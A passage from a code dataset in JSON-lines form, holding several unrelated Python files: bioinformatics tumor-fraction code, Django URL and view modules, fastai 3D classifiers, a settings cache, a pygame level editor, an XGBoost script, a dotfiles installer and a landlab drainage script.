pd.DataFrame({'Sample_ID':sample_id,'GENE':gene,'Copy_num':copy_num,'Log_ratio':lr,})\r\n\r\ndel sample_id,gene,lr,copy_num\r\n\r\n# =============================================================================\r\n# Tumor fraction estimation\r\n# =============================================================================\r\n\r\nprint('Sample tumor fraction (TF) calculation: 17-095-3rd-cfDNA')\r\n\r\nprint('\\nSample mutations:')\r\nprint(muts.head())\r\n\r\nprint('\\nCheck log-ratio of mutated genes. Do not use mutations on genes with log-ratio > 0.3. In this case, no genes amplified.')\r\nprint(cn)\r\n\r\nprint('\\nCheck depth. Do not use mutation with depth < 30 reads. In this case, all depths are above 30.')\r\nprint(muts[['GENE','Read_depth']])\r\n\r\nprint('\\nCheck for mutations on allosomes. Mutations on allosomes will not be considered when calculating tumor fraction. In this case, all mutations are on autosomes.')\r\nprint(muts[['GENE','CHROM']])\r\n\r\nprint('\\nAdjust allele frequencies to conservatively calculate the VAF if the observed VAF is a 95% quantile outlier.')\r\nmuts['Adj_allele_frequency'] = muts.apply(lambda row: get_adj_maf(row['Allele_frequency'], row['Read_depth']), axis = 1)\r\nprint(muts[['GENE','Allele_frequency','Adj_allele_frequency']])\r\n\r\nprint('\\nCalculate tumor fraction (TF) for every mutation using TF = 2 / (1 + 1 / AF), where AF is the adjusted allele frequency.')\r\nmuts['Tumor fraction'] = 2 / (1 + 1/muts['Adj_allele_frequency'])\r\nprint(muts[['GENE','Allele_frequency','Adj_allele_frequency','Tumor fraction']])\r\n\r\nprint('\\nThe tumor fraction of the sample is the highest calculated. Mutation must not have low depth, an amplification, or be located on an allosome.')\r\nprint('\\nIn this case, the tumor fraction of 17-095-3rd-cfDNA is 12.2%, based on the FGFR1 and TP53 mutations.')", "sub_path": "Python/TumorFraction_walkthrough.py", "file_name": "TumorFraction_walkthrough.py", "file_ext": "py", "file_size_in_byte": 3287, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pandas.set_option", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.stats.binom", "line_number": 17, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 17, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 50, "usage_type": "call"}]}
+{"seq_id": "263439170", "text": "from django.conf.urls import patterns, url\nfrom django.conf import settings\nfrom django.conf.urls.static import static \n\nfrom . import views\n\napp_name = 'position_papers'\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^submission/$', views.submission, name='submission'),\n url(r'^user_submission/$', views.user_submission, name=\"user_submission\"),\n url(r'^success/$', views.success, name='success'),\n url(r'^submit/$', views.submit, name='submit'),\n url(r'^staff/$', views.staff, name='staff'),\n url(r'^committee/$', views.committee, name='committee'),\n url(r'^committee_select/$', views.committee_select, name='committee_select'),\n url(r'^committee_papers/$', views.committee_papers, name='committee_papers'),\n url(r'^position_dropdown/$', views.position_dropdown, name='position_dropdown'),\n url(r'^get_json_positions/$', views.get_json_positions, name='get_json_positions'),\n) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n", "sub_path": "position_papers/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1004, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.static.static", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 20, "usage_type": "attribute"}]}
+{"seq_id": "261378515", "text": "from fastai.basics import *\nfrom fastai.callbacks.hooks import dummy_eval\nfrom ..layers import *\n\n__all__ = ['Simple3d', 'ClassifierHead', 'Conv1dClassifierHead', 'LstmClassifierHead']\n\ndef conv_pool(ni, nf, ks=3, stride=1, do_pooling=False, **kwargs):\n pool = do_pooling and any([e>1 for e in listify(stride)])\n conv = conv_layer3d(ni, nf, stride=1 if pool else stride, **kwargs)\n if pool: return nn.Sequential(conv, nn.MaxPool3d(stride))\n else : return conv\n\nclass Simple3d(nn.Sequential):\n def __init__(self, vol_size, num_layers, ni=1, nf=16, hidden=200, num_classes=2, drop_conv=0, drop_out=0,\n separable_convs=False, concat_pool=False, self_attention=False, do_pooling=True):\n layers = [conv_layer3d(ni, nf, ks=3, stride=[2 if e > max(vol_size)//2 else 1 for e in vol_size])]\n x = dummy_eval(layers[0], vol_size).detach()\n \n for i in range(num_layers-1):\n dims = x.shape[-3:]\n strides = 1 if i==num_layers-2 else [2 if e > max(dims)//2 else 1 for e in dims]\n sa = self_attention and (i==num_layers-4)\n layers.append(conv_pool(nf, nf*2, stride=strides, do_pooling=do_pooling, separable=separable_convs, self_attention=sa))\n nf *= 2\n x = layers[-1].eval()(x)\n \n if concat_pool:\n pool = AdaptiveConcatPool3d()\n nf *= 2\n else:\n pool = nn.AdaptiveMaxPool3d(1)\n \n layers += [pool, Flatten(), ClassifierHead([nf,hidden,num_classes],[drop_conv,drop_out])]\n super().__init__(*layers)\n\nclass ClassifierHead(nn.Sequential):\n def __init__(self, layers, drops):\n mod_layers = []\n activs = [nn.ReLU(inplace=True)] * (len(layers) - 2) + [None]\n for n_in,n_out,p,actn in zip(layers[:-1],layers[1:], drops, activs):\n mod_layers += bn_drop_lin(n_in, n_out, p=p, actn=actn)\n super().__init__(*mod_layers)\n\nclass Conv1dClassifierHead(nn.Sequential):\n def __init__(self, features_in, conv_layers, layers, drops, ks=5, stride=3):\n mod_layers = []\n for i, (n_in,n_out) in enumerate(zip([features_in]+conv_layers[:-1], conv_layers)):\n mod_layers += [nn.BatchNorm1d(n_in),\n nn.Conv1d(n_in, n_out, kernel_size=ks, stride=stride), nn.ReLU(inplace=True)]\n if i == len(conv_layers)-1: mod_layers += [nn.AdaptiveMaxPool1d(1), Flatten()]\n \n mod_layers += [ClassifierHead([n_out]+layers, drops)]\n super().__init__(*mod_layers)\n \nclass LstmClassifierHead(nn.Module):\n def __init__(self, features_in, nf_rnn, layers, drops, bidirectional=False, pool=False):\n super().__init__()\n self.ndir = 2 if bidirectional else 1\n self.rnn = nn.LSTM(features_in, nf_rnn, 1, bidirectional=bidirectional).cuda()\n self.do_pool = pool\n nf = nf_rnn\n if bidirectional: nf *= 2\n if pool: nf *= 3\n self.layers = ClassifierHead([nf]+layers, drops)\n \n def pool(self, x, is_max):\n f = F.adaptive_max_pool1d if is_max else F.adaptive_avg_pool1d\n return f(x.permute(1,2,0), (1,)).squeeze()\n \n def forward(self, x):\n out, *_ = self.rnn(x.transpose(0,1))\n if self.do_pool:\n avgpool = self.pool(out, False)\n mxpool = self.pool(out, True)\n out = torch.cat([out[-1], mxpool, avgpool], 1)\n else:\n out = out[-1]\n \n return self.layers(out)\n", "sub_path": "fastai_scans/models/classification.py", "file_name": "classification.py", "file_ext": "py", "file_size_in_byte": 3491, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "fastai.callbacks.hooks.dummy_eval", "line_number": 17, "usage_type": "call"}, {"api_name": "layers.append", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "297331132", "text": "from couchdb_layer.mcm_database import database\nfrom tools.locker import locker\nfrom tools.countdown_cache import CountdownCache\n\n__cache = CountdownCache()\n__db = database('settings')\n\ndef get(label):\n with locker.lock(label):\n cache_key = 'settings_' + label\n cached_value = __cache.get(cache_key)\n if cached_value is not None:\n return cached_value\n setting = __db.get(label)\n __cache.set(cache_key, setting)\n return setting\n\ndef get_value(label):\n return get(label)['value']\n\ndef get_notes(label):\n return get(label)['notes']\n\ndef add(label, setting):\n with locker.lock(label):\n result = __db.save(setting)\n if result:\n cache_key = 'settings_' + label\n __cache.set(cache_key, setting)\n return result\n\ndef set_value(label, value):\n with locker.lock(label):\n setting = get(label)\n setting['value'] = value\n return set(label, setting)\n\ndef set(label, setting):\n with locker.lock(label):\n result = __db.update(setting)\n if result:\n # Maybe it's a better idea to cache the setting immediately instead\n # getting it from database?\n new_value = __db.get(label)\n cache_key = 'settings_' + label\n __cache.set(cache_key, new_value)\n return result\n\ndef cache_size():\n return __cache.get_length(), __cache.get_size()\n\ndef clear_cache():\n size = cache_size()\n __cache.clear()\n return size\n", "sub_path": "mcm/tools/settings.py", "file_name": "settings.py", "file_ext": "py", "file_size_in_byte": 1502, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "tools.countdown_cache.CountdownCache", "line_number": 5, "usage_type": "call"}, {"api_name": "couchdb_layer.mcm_database.database", "line_number": 6, "usage_type": "call"}, {"api_name": "tools.locker.locker.lock", "line_number": 9, "usage_type": "call"}, {"api_name": "tools.locker.locker", "line_number": 9, "usage_type": "name"}, {"api_name": "tools.locker.locker.lock", "line_number": 25, "usage_type": "call"}, {"api_name": "tools.locker.locker", "line_number": 25, "usage_type": "name"}, {"api_name": "tools.locker.locker.lock", "line_number": 33, "usage_type": "call"}, {"api_name": "tools.locker.locker", "line_number": 33, "usage_type": "name"}, {"api_name": "tools.locker.locker.lock", "line_number": 39, "usage_type": "call"}, {"api_name": "tools.locker.locker", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "14753908", "text": "import pickle\n\nimport ezTypes as ez\nimport pygame\n\nLevelWidth = int(input('Please enter the width of the level: '))\nLevelHeight = int(input('Please enter the height of the level: '))\n\n# Create the window\nscreen = pygame.display.set_mode([LevelWidth * 20, (LevelHeight * 20) + 20])\npygame.display.set_caption('Level Creator')\n\n\ndef savelevel(data: any, savename: str) -> None:\n \"\"\"Saves the created level to the supplied filename.\"\"\"\n with open(savename, 'wb') as file:\n pickle.dump(data, file)\n\n\ndef drawsq(color: str, pos: tuple) -> None:\n \"\"\"Draws a square in the given position with the specified color.\"\"\"\n pygame.draw.rect(screen, color, pygame.Rect(pos[0], pos[1], 20, 20))\n\n\ngrid = [['' for i in range(LevelWidth)] for j in range(LevelHeight)]\ncolorGrid = [['' for i in range(LevelWidth)] for j in range(LevelHeight)]\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit(0)\n if event.type == pygame.MOUSEBUTTONDOWN:\n # Place or remove tiles on the map\n if 0 < event.pos[0] < LevelWidth * 20 and 20 < event.pos[1] < ((LevelHeight + 1) * 20):\n if event.button in [1, 3]:\n grid[(event.pos[1] // 20) - 1][event.pos[0] // 20] = ez.select if event.button == 1 else ''\n colorGrid[(event.pos[1] // 20) - 1][\n event.pos[0] // 20] = ez.colorSelect if event.button == 1 else ez.AIR\n # Tile selection menu\n if 0 < event.pos[0] < LevelWidth * 20 and 0 < event.pos[1] < 20 and event.button == 1:\n xUnit = event.pos[0] // 20\n try:\n ez.select = ez.types[xUnit]\n ez.colorSelect = ez.colorTypes[xUnit]\n except IndexError:\n pass\n # Export button\n if (LevelWidth - 1) * 20 < event.pos[0] < LevelWidth * 20 and 0 < event.pos[1] < 20 and event.button == 1:\n savelevel(grid, '00001.level')\n print('Saved \"00001.level\"!')\n if event.type == pygame.MOUSEMOTION:\n if 0 < event.pos[0] < LevelWidth * 20 and 0 < event.pos[1] < 20:\n try:\n pygame.display.set_caption(f'Select tile type: {ez.types[event.pos[0] // 20]}')\n except IndexError:\n if event.pos[0] // 20 == LevelWidth - 1:\n pygame.display.set_caption('Export')\n else:\n pygame.display.set_caption('Level Creator')\n else:\n pygame.display.set_caption('Level Creator')\n if event.buttons[0] == 1 or event.buttons[2] == 1:\n grid[(event.pos[1] // 20) - 1][event.pos[0] // 20] = ez.select if event.buttons[0] == 1 else ''\n if event.buttons[0] == 1:\n colorGrid[(event.pos[1] // 20) - 1][event.pos[0] // 20] = ez.colorSelect\n else:\n colorGrid[(event.pos[1] // 20) - 1][event.pos[0] // 20] = ez.AIR\n\n # Draw the map tiles\n for y in range(len(grid)):\n for x in range(len(grid[y])):\n if not grid[y][x] == '':\n drawsq(colorGrid[y][x], (x * 20, (y + 1) * 20))\n\n # Draw the tile selection bar\n for i in range(len(ez.types)):\n drawsq(ez.colorTypes[i], (i * 20, 0))\n\n # Draw the yellow export button\n drawsq((252, 231, 3), ((LevelWidth - 1) * 20, 0))\n\n # Draw the grid\n for x in range(0, (LevelWidth * 20), 20):\n for y in range(20, 20 + (LevelHeight * 20), 20):\n pygame.draw.rect(screen, (255, 255, 255), pygame.Rect(x, y, 20, 20), 1)\n\n # Draw the red bounding box\n pygame.draw.rect(screen, (255, 0, 0), pygame.Rect(0, 20, LevelWidth * 20, LevelHeight * 20), 1)\n\n # Update screen then wipe the buffer for the next frame\n pygame.display.flip()\n screen.fill((0, 0, 0))\n", "sub_path": "tools/LevelCreator/LevelCreator.py", "file_name": "LevelCreator.py", "file_ext": "py", "file_size_in_byte": 3954, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pygame.display.set_mode", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 33, "usage_type": "attribute"}, {"api_name": "ezTypes.select", "line_number": 37, "usage_type": "attribute"}, {"api_name": "ezTypes.colorSelect", "line_number": 39, "usage_type": "attribute"}, {"api_name": "ezTypes.AIR", "line_number": 39, "usage_type": "attribute"}, {"api_name": "ezTypes.select", "line_number": 44, "usage_type": "attribute"}, {"api_name": "ezTypes.types", "line_number": 44, "usage_type": "attribute"}, {"api_name": "ezTypes.colorSelect", "line_number": 45, "usage_type": "attribute"}, {"api_name": "ezTypes.colorTypes", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEMOTION", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 55, "usage_type": "attribute"}, {"api_name": "ezTypes.types", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 62, "usage_type": "attribute"}, {"api_name": "ezTypes.select", "line_number": 64, "usage_type": "attribute"}, {"api_name": "ezTypes.colorSelect", "line_number": 66, "usage_type": "attribute"}, {"api_name": "ezTypes.AIR", "line_number": 68, "usage_type": "attribute"}, {"api_name": "ezTypes.types", "line_number": 77, "usage_type": "attribute"}, {"api_name": "ezTypes.colorTypes", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 92, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 92, "usage_type": "attribute"}]}
+{"seq_id": "280513546", "text": "\nfrom xgboost import XGBClassifier\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import StandardScaler\n#from sklearn.model_selection import GridSearchCV \n#from sklearn.decomposition import PCA\n\ntrain_df = pd.read_csv('train.csv')\ntest_df = pd.read_csv('test.csv')\n\nX_train = train_df.drop('target',axis=1)\ny_train = train_df['target']\n\n#pca = PCA(n_components = 2)\n#X_train = pca.fit_transform(X_train)\n\nx_train,x_validation,y_train,y_validation = train_test_split(X_train,y_train,test_size=0.2,random_state=0)\n\nsc = StandardScaler()\nx_train = sc.fit_transform(x_train)\nx_validation = sc.transform(x_validation)\ntest_norm = sc.transform(test_df)\n\nclassifier = XGBClassifier(max_depth = 10, subsample = 1, min_child_weight = 1.5, eta = 0.1, colsample_bytree = 0.5, seed = 42, num_rounds = 1000, silent = 1)\nclassifier.fit(x_train,y_train)\n\n#y_pred = classifier.predict(x_validation)\ny_pred = classifier.predict_proba(test_norm)\ny_pred = y_pred[:,1]\ny_pred = (y_pred > 0.5)\n\nsub=pd.DataFrame()\ntest_id = test_df.id.values\nsub['id'] = test_id\nsub['target'] = y_pred\nsub.to_csv('Xgboost4.csv', index=False)\n\n#y_pred = classifier.predict(x_validation)\n\ncm = confusion_matrix(y_validation,y_pred)\n\nacc = accuracy_score(y_validation, y_pred)\n\n\naccuracies = cross_val_score(estimator = classifier , X = x_train, y = y_train, cv = 10)\naccuracies.mean()\naccuracies.std()\n\nparameters = [{'learning_rate':[0.05,0.08,0.1,]}]\n\ngrid_search = GridSearchCV(estimator= classifier, param_grid = parameters, scoring = 'accuracy', cv = 10, n_jobs = -1)\n\ngrid_search = grid_search.fit(x_train,y_train)\nbest_accuracy = grid_search.best_score_\nbest_parameters = grid_search.best_params_\n", "sub_path": "Xgboost.py", "file_name": "Xgboost.py", "file_ext": "py", "file_size_in_byte": 1909, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 25, "usage_type": "call"}, {"api_name": "xgboost.XGBClassifier", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "160581354", "text": "from django.shortcuts import render\n\n# Create your views here.\nfrom django.http import HttpResponse\n\nimport orchestrator.utils.cache_utils as cache\nimport orchestrator.utils.airflow_utils as airflow_utils\nimport orchestrator.utils.constants as constants\n\nimport json\n\n\ndef index(request):\n\n commodity = request.GET.get(\"commodity\")\n state = request.GET.get(\"state\")\n region = request.GET.get(\"region\")\n start_date = request.GET.get(\"start_date\")\n end_date = request.GET.get(\"end_date\")\n\n apmc = request.GET.get(\"apmc\")\n news = request.GET.get(\"news\")\n sector = request.GET.get(\"sector\")\n social_media = request.GET.get(\"social_media\")\n politics = request.GET.get(\"politics\")\n nature = request.GET.get(\"nature\")\n global_cues = request.GET.get(\"global_cues\")\n\n print(\"Values Received : \")\n\n print(str(commodity) + str(state) + \" \" + str(region) + \" \" + str(start_date) + \" \" + str(end_date) + \" \" + str(apmc) + \" \"\n + str(news) + \" \" + str(sector) + \" \" + str(social_media) + \" \" + str(politics) + \" \"\n + str(nature) + \" \" + str(global_cues))\n\n configuration = {\n \"meta\" : {\n \"commodity\": commodity,\n \"state\": state,\n \"region\": region,\n \"start_date\": start_date,\n \"end_date\": end_date\n\n },\n \"sources\" : [apmc, news, sector, social_media, politics, nature, global_cues],\n }\n\n cache.set(\"configuration\", json.dumps(configuration))\n\n print(\"From Cache : \" + str(cache.get(\"configuration\")))\n configuration_cached = cache.get(\"configuration\")\n configuration_cached = json.loads(configuration_cached)\n print(configuration_cached[\"sources\"])\n\n airflow_utils.trigger_airflow_dag(constants.DAG_ID)\n\n return HttpResponse(\"
ElasticFlow Configured Successfully
\")\n", "sub_path": "kreate_elasticrun/orchestrator/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1941, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "orchestrator.utils.cache_utils.set", "line_number": 47, "usage_type": "call"}, {"api_name": "orchestrator.utils.cache_utils", "line_number": 47, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "orchestrator.utils.cache_utils.get", "line_number": 49, "usage_type": "call"}, {"api_name": "orchestrator.utils.cache_utils", "line_number": 49, "usage_type": "name"}, {"api_name": "orchestrator.utils.cache_utils.get", "line_number": 50, "usage_type": "call"}, {"api_name": "orchestrator.utils.cache_utils", "line_number": 50, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "orchestrator.utils.airflow_utils.trigger_airflow_dag", "line_number": 54, "usage_type": "call"}, {"api_name": "orchestrator.utils.airflow_utils", "line_number": 54, "usage_type": "name"}, {"api_name": "orchestrator.utils.constants.DAG_ID", "line_number": 54, "usage_type": "attribute"}, {"api_name": "orchestrator.utils.constants", "line_number": 54, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "1621085", "text": "#!/usr/bin/env python3\n\nimport argparse\nfrom os import remove, symlink\nfrom os.path import abspath, dirname, exists, expanduser, join, normpath\nfrom pathlib import PosixPath\n\nROOT_DIR = dirname(abspath(__file__))\nargs = None\nDRY_RUN_PREFIX = \"(DRY RUN)\"\n\n\ndef create_symlink(src, target):\n if args.dry_run:\n print(DRY_RUN_PREFIX, \"Creating symlink {} to {}\".format(target, src))\n return\n print(\"Creating symlink {} to {}\".format(target, src))\n try:\n remove(target)\n except FileNotFoundError:\n pass\n target_dir = dirname(target)\n if not exists(target_dir):\n PosixPath(target_dir).mkdir(parents=True)\n symlink(src, target)\n\n\ndef install_zsh_config(args):\n target_map = [\n (\"zsh/.zshrc\", \".zshrc\"),\n (\"zsh/.zshrc_aliases\", \".zshrc_aliases\"),\n (\"zsh/.zshrc_ohmyzsh\", \".zshrc_ohmyzsh\"),\n (\"zsh/.zshrc_path\", \".zshrc_path\"),\n (\"zsh/.zshenv\", \".zshenv\"),\n (\"../common/.profile\", \".profile\"),\n (\"../common/.zprofile\", \".zprofile\"),\n (\"../common/zsh/.zshrc_other\", \".zshrc_other\"),\n (\"../common/git/.gitconfig\", \".gitconfig\"),\n (\"../common/git/.gitignore_global\", \".gitignore_global\"),\n (\"ssh/config\", \".ssh/config\"),\n (\"../common/neovim/init.vim\", \".config/nvim/init.vim\"),\n (\"../common/nodenv/version\", \".nodenv/version\"),\n (\"../common/rbenv/version\", \".rbenv/version\"),\n (\"../common/pyenv/version\", \".pyenv/version\"),\n (\"../common/goenv/version\", \".goenv/version\"),\n (\"../common/boto/.boto\", \".boto\"),\n (\"tmux/.tmux.conf\", \".tmux.conf\"),\n (\"vscode/settings.json\", \"Library/Application Support/Code/User/settings.json\"),\n (\n \"../common/vscode/keybindings.json\",\n \"Library/Application Support/Code/User/keybindings.json\",\n ),\n (\"gnupg/gpg-agent.conf\", \".gnupg/gpg-agent.conf\"),\n ]\n for i in target_map:\n src = normpath(join(ROOT_DIR, i[0]))\n target = join(expanduser(\"~\"), i[1])\n create_symlink(src, target)\n\n\ndef run():\n global args\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dry-run\", action=\"store_true\")\n args = parser.parse_args()\n install_zsh_config(args)\n\n\nif __name__ == \"__main__\":\n run()\n", "sub_path": "macos/update.py", "file_name": "update.py", "file_ext": "py", "file_size_in_byte": 2287, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 8, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "pathlib.PosixPath", "line_number": 24, "usage_type": "call"}, {"api_name": "os.symlink", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 57, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 63, "usage_type": "call"}]}
+{"seq_id": "617627212", "text": "#!/usr/bin/env python3n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 23 14:05:21 2017\n\ncreating flow_directions_mfd\n\n@author: katybarnhart\n\"\"\"\n#%%\ndef drainagePlot(mg, receivers=None, proportions=None, surf_cmap='viridis', surface='topographic__elevation'):\n import matplotlib.pylab as plt\n from pylab import show\n from landlab.plot.imshow import imshow_node_grid\n from matplotlib.collections import LineCollection\n import numpy as np\n \n imshow_node_grid(mg, surface, cmap=surf_cmap)\n \n if receivers is None:\n receivers = np.reshape(mg.at_node['flow__receiver_node'],(mg.number_of_nodes,1))\n \n nseg=2000\n tmax=1\n t=np.linspace(0,tmax,nseg)\n nreceievers = int(receivers.size/receivers.shape[0])\n \n propColor=plt.get_cmap('magma')\n \n for i in mg.nodes.flatten():\n for j in range(nreceievers):\n if receivers[i,j]>0:\n x = np.linspace(mg.node_x[i], mg.node_x[receivers[i,j]], nseg)\n y = np.linspace(mg.node_y[i], mg.node_y[receivers[i,j]], nseg)\n \n points = np.array([x, y]).T.reshape(-1, 1, 2)\n segments = np.concatenate([points[:-1], points[1:]], axis=1)\n \n if proportions is not None:\n lu = int(np.floor(proportions[i,j]*256))\n lc = LineCollection(segments, linewidths=1.+10.*t)\n lc.set_color(propColor(lu))\n else:\n lc = LineCollection(segments, \n cmap='magma',\n norm=plt.Normalize(0, tmax),\n linewidths=1.+10.*t)\n \n \n \n lc.set_array(t)\n plt.gca().add_collection(lc)\n \n \n plt.plot(x, y, 'b')\n plt.plot(mg.node_x, mg.node_y, 'r.')\n show()\nfrom landlab.components.flow_accum.flow_accumulator import FlowAccumulator\n\n\n\nfrom landlab.components.flow_director.flow_direction_mfd import flow_directions_mfd\n\nimport numpy as np\nfrom landlab import RasterModelGrid\nfrom landlab.plot.imshow import imshow_node_grid\n\nmg = RasterModelGrid((7,7), spacing=(1, 1))\nmg.set_closed_boundaries_at_grid_edges(True, True, True, False)\n_ = mg.add_field('topographic__elevation', mg.node_x**2+mg.node_y**2, at = 'node')\n\nfa=FlowAccumulator(mg, 'topographic__elevation', flow_director='D4')\nfa.run_one_step()\n\nimshow_node_grid(mg, 'topographic__elevation', cmap='viridis')\n#%%\ndrainagePlot(mg)\n\nsurface_values = mg.at_node['topographic__elevation']\n\n#%%\nelev = surface_values \nneighbors_at_node = mg.neighbors_at_node\nlinks_at_node = mg.links_at_node\nactive_link_dir_at_node = mg.active_link_dirs_at_node\ntail_node = mg.node_at_link_tail[np.arange(mg.number_of_links)]\nhead_node = mg.node_at_link_head[np.arange(mg.number_of_links)]\nlink_slope = - mg.calc_grad_at_link(elev)\nbaselevel_nodes = None\npartition_method='slope'\n#%%\n(receivers, \nproportions, \nsteepest_slope, \nsteepest_receiver, \nsink, \nreceiver_links, \nsteepest_link)= flow_directions_mfd(elev, \n neighbors_at_node,\n links_at_node,\n active_link_dir_at_node,\n tail_node, \n head_node, \n link_slope, \n baselevel_nodes=None,\n partition_method='square_root_of_slope')\n\n#%%\n\ndrainagePlot(mg, receivers=receivers, proportions=proportions)\n\n\n", "sub_path": "creating_MFD_directions.py", "file_name": "creating_MFD_directions.py", "file_ext": "py", "file_size_in_byte": 3649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "landlab.plot.imshow.imshow_node_grid", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 25, "usage_type": "call"}, {"api_name": 